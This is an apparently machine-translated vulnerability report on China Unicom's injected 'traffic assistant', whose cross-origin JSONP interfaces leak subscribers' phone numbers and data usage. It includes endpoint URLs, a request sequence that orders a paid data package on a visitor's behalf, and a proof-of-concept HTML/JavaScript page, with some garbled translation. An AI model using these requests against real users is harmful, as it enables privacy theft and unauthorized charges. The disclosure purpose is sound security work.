Cross-Domain jsonp interface of a website of China Unicom leads to information leakage (risks arising from additional feature insertion by the operator)

Cross-Domain jsonp interface of a website of China Unicom leads to information leakage (risks arising from additional feature insertion by the operator)

Cross-Domain jsonp interface of a website of China Unicom causes information leakage, which may cause leakage of users' mobile phone numbers and traffic usage.
At the same time, an interface may be maliciously used to quickly consume user calls.

First, let's open a brain hole. Now China Unicom is engaged in link hijacking. During your normal internet access process, you will be provided with codes of unknown origins and advertisements, it also includes what they call "traffic assistant" and "wowo ~ Assistant.


 

(Picture from network)



As shown in the figure, the bottom is inserted with China Unicom's "Woo ~ "Assistant" is used to show you the current traffic.



** First, let's talk about the security of his link without saying whether his link hold is legal. If you insert the relevant code into my page, you may need to request cross-origin requests to your Unicom server for relevant data retrieval. As a person who can control the current webpage, there should be a way to obtain information from your cross-origin request, such as the mobile phone number or something, which may cause information leakage. **



This vulnerability is probably used in Guangdong as an example because I cannot test the relevant systems in other provinces. If you can check the situation in other provinces.



Guangdong Unicom has a service that seems to be enabled by default, and I do not know it, that is, Unicom's Internet Assistant.


 

When we access the Internet, the corresponding code will be inserted into the page.


 

In the lower left corner, they inserted something like a traffic ball, and the problem is that it appears here.


 

In this area, he will display your current traffic and total monthly traffic. It does not seem to have a complete mobile phone number on the user's ** display, only a four-digit number like 156 *** 8888 is missing, but the complete number is transmitted during cross-origin interaction.



After testing, the inserted location uses the jsonp cross-origin request data, and this causes a problem.



For details, see the vulnerability proof.

Vulnerability Domain Name :**.**.**.**

After several days of observation, it seems that only Guangdong Unicom's mobile Internet users can access the content under this domain name. Users in other provinces cannot.

At the same time, it hurts that some mobile browsers now have functions similar to "Provincial traffic access", which leads to the jsonp interface that sometimes requests are not directly sent from the user's browser, but starting from the corresponding Transit server, and these servers are inaccessible, therefore, in some mobile browsers, you must turn off the corresponding "Provincial traffic access" function to access this interface.



==============================



Almost all interfaces under **. ** can use jsonp cross-origin to obtain data. The following are some of the APIs with outstanding functions.



==============================


 

http://**.**.**.**/html/servicereq/queryMessageList?callback=angular.callbacks._13&reqparam=%7B%22flag%22:%22-1%22,%22number%22:%2210%22,%22startNum%22:%221%22%7D

Obtains the user message, including the complete mobile phone number of the user.


 

==============================


 

http://**.**.**.**/html/servicereq/activetrafficquery?callback=angular.callbacks._13&reqparam=%7B%7D

Obtains the traffic information currently used by the user.


 

==============================



Combined Use


 

http://**.**.**.**/html/servicereq/packagestore?callback=angular.callbacks._64&reqparam=%7B%7D

 

Get package ID


 

http://**.**.**.**/html/servicereq/commonpkgsub?callback=angular.callbacks._6d&reqparam=%7B%22id%22:%22-147014340A146%22%7D

Place an order with the ID-147014340A146


 

http://**.**.**.**/html/servicereq/confirmpkgsub?callback=angular.callbacks._6f&reqparam=%7B%22id%22%3A%22-147014340A146%22%2C%22flowUpshiftFlag%22%3A%220%22%2C%22saleid%22%3A%22%22%2C%22effecttime%22%3A%7B%22value%22%3A%220%22%7D%2C%22effectperiod%22%3A%7B%22value%22%3A%221%22%7D%2C%22isMonthPack%22%3A%221%22%2C%22taskId%22%3A%22%22%7D

 

Secondary confirmation



By visiting these addresses in turn, you can help Unicom users who access the current page to activate a 10-dollar traffic fast food package, at this time, the user's mobile phone will prompt the successful activation (I spent 20 yuan to test this place-l



If a malicious person repeats these steps, it may cause huge losses to the user.



I personally estimate that the second step can be omitted, but I have no money to test ......



==============================

==============================



In order to test, I wrote a simple page for testing, and obtained the mobile phone number and traffic usage of the currently accessed Unicom user from the cross-domain system.


 

<Script>
Function phoneNumber (data ){
Alert ("your mobile phone number is:" + data ['respparam'] ['phonenumber']);
}
Function trafficUsage (data ){
Alert ("as of" + data ['refreshparam'] ['trafficusage'] ['traffictime'] + "\ n you have" + data ['refreshparam'] ['trafficusage'] ['Total'] + "KB \ n used" + data ['referenceam'] ['trafficusage'] ['used'] + "KB \ n ");
}
</Script>
<Script src = "http: // **. **/html/servicereq/queryMessageList? Callback = phoneNumber & reqparam = % 7B % 22 flag % 22% 3A % 22-1% 22% 2C % 22 number % 22% 3A % 2210% 22% 2C % 22 startNum % 22% 3A % 221% 7D "> </script>
<Script src = "http: // **. **/html/servicereq/activetrafficquery? Callback = trafficUsage & reqparam = % 7B % 22 applist % 22: % 22 itaocanresult % 22% 7D "> </script>

 

 

 

Solution:

I want to write Referer protection like most jsonp interfaces, but I want to know that this page and jsonp interface are inserted on various websites, including the dark clouds that I visit now, so it doesn't make sense to do this.



If possible, I think it would be nice to disable the entire function instead of holding the link. It does not affect users' normal online experience, nor is it known that the link is being abused to hold advertisements in disorder.



Please decide the specific solution